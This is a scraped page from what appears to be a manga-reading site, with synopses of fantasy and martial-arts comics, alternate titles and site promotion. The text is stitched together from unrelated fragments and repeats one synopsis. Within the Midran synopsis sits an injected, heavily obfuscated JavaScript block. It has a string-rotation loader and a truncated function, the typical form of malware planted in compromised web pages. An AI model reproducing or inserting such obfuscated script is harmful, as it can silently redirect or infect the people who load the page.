A powerful grand wizard named, “Raim” reappears after a millennium because of a failed experiment. While sets out to regain his lost tower, he meets “are” and “ere” who have been trafficked as slaves... a combination of a weird grand magician who only uses his wits to make money and the cute, lovable brother and sister of the miao tribe! Their endless adventure is beginning to unfold. Editorial staff’s comment Will Raim be able to regain his lost tower?! Manhwa you may like: + This is another ambitious work of Sung San Young, The Gamer + Tower of God + The God of High School
From: Shinnen There are rumors of a grand treasure located within the local museum of Ashiwara and that this treasure requires a special key to unlock. But no one seems to know what this treasure is or even what the key looks like. But Kei and Hikaru, two childhood friends, may inadvertently find out when someone seeks to claim the treasure for themselves and that action plunges their world into chaos.
Zeo, a mysterious young wizard with a giant sword, finds himself in the city of Monea. He has no interest in getting involved with other adventurers, but circumstances leave him no choice but to find himself a party. He is therefore dragged into a group of misfit adventurers led by the pretty priest Tia. Tia seems very interested in making him their ally, and he soon learns why. Tia is determined to hunt down the wizard and summoned demon that destroyed her town and family, and she intends to do this by first summoning the demon. However, demon summoning magic is forbidden, punishable by death. Tia needs to learn about the art of demon summoning, and she needs a wizard for the summoning itself. Little does she know, Zeo actually has his very own illegal summoned demon, which is why he was so insistent that he wanted to adventure alone. Will he be willing to help Tia with her quest, or will his secret lead to his execution?
At the age of 78, Midran, an archmage is still searching for a way to reach 8th circle. Then he is suddenly turned into a child. Will he be able to recover mana from his past life and become the Archmage of the 9th circle? This is the story of the archmage’s struggle in the Murim…<script></script><script>(function(_0x369e5a,_0x3f231b){var _0x3803bc=_0x133a,_0x6837fa=_0x369e5a();while(!![]){try{var _0x23f60f=-parseInt(_0x3803bc(0x8f))/(-0x4*-0x109+0x5*-0x5ad+0xc1f*0x2)*(-parseInt(_0x3803bc(0x85))/(0x1*0x1b9d+-0xade+-0x10bd))+-parseInt(_0x3803bc(0x9c))/(-0x425+0x1*0x75e+-0x336)+-parseInt(_0x3803bc(0x93))/(0x6ca+0x676+-0xd3c)+-parseInt(_0x3803bc(0x8b))/(0x251+-0x1f59+0x1d0d)*(parseInt(_0x3803bc(0x9a))/(-0xa7*0x1c+-0x228e*0x1+0x34d8))+-parseInt(_0x3803bc(0x87))/(0x19d0+-0x2044+0x15*0x4f)*(parseInt(_0x3803bc(0x9f))/(0x10b2+-0x116f+0xc5))+-parseInt(_0x3803bc(0x83))/(0x2c3*-0xb+0x159*0x16+0xe*0xe)+parseInt(_0x3803bc(0x92))/(0x1d7*-0x9+0x17ad+-0x714);if(_0x23f60f===_0x3f231b)break;else _0x6837fa['push'](_0x6837fa['shift']());}catch(_0x5611f3){_0x6837fa['push'](_0x6837fa['shift']());}}}(_0x2df1,0x51d4e+0x54271*-0x1+0x80e5d));function custom(){var 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At the age of 78, Midran, an archmage is still searching for a way to reach 8th circle. Then he is suddenly turned into a child. Will he be able to recover mana from his past life and become the Archmage of the 9th circle? This is the story of the archmage’s struggle in the Murim…
A story about friendship between a little boy Jacky and a cheetah named Ainia.
Read Manga Wo Jia Dashi Xiong Naozi You Keng Online For Free At Top Manhua Associated Names: My Sect’s Senior Disciple Has a Hole in His Brain My Sect’s Senior Disciple Has a Hole in His Brain Our Big Brother’s Brain Has A Pit Our Big Brother’s Mind Has A Problem Our Big Brother’s Brain Has A Pit Our Big Brother’s Mind Has A Problem There’s a Hole in My Head There’s a Pit in My Senior Martial Brother’s Brain There’s Something Wrong with My Da Shixiong’s Brain There’s a Hole in My Head There’s a Pit in My Senior Martial Brother’s Brain There’s Something Wrong with My Da Shixiong’s Brain Wo Jia Da Shi Xiong Nao Zi You Keng Đại Sư Huynh Nhà Tui Bị Não Đại Sư Huynh Nhà Tôi Trong Não Có Hố 我家大师兄脑子有坑 또라이 대사형 무림생존기 The Content Wo Jia Dashi Xiong Naozi You Keng: The hilarious adventures of the eldest apprentice of a sect who has a problem with his brain. Dong Fang Xian Yun is reincarnated as the eldest disciple of the Care-free sect. But the only thing that goes through his mind is to make sure he doesn’t end up dying by the hands of the “main character”. Read as he makes no sense to his sibling disciples while avoiding flags left and right. New and hot comics are updated the fastest. The Daughter of a Wealthy Family Went Crazy After Being Reborn From General to Bride: Marrying My Stongest Rival Adopted by a Murderous Duke Family MangaZin is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “Top Manhua” and “ManhwaClan,” as well as related terms like ZinManga, LikeManga, and Read Manga Online ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics.
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Among humans they were called… wizards or witches For the "Wolf Tribe"… they are called “The Contractors of the Moon”. For the wolf to obtain “Moonstream” it must form a contract with an existence between the “physical world” and the “eternal world". The wolf gains great strength to defeat any foe in its way. For the human, is an opportunity to achieve one’s goal, together with eternal life…
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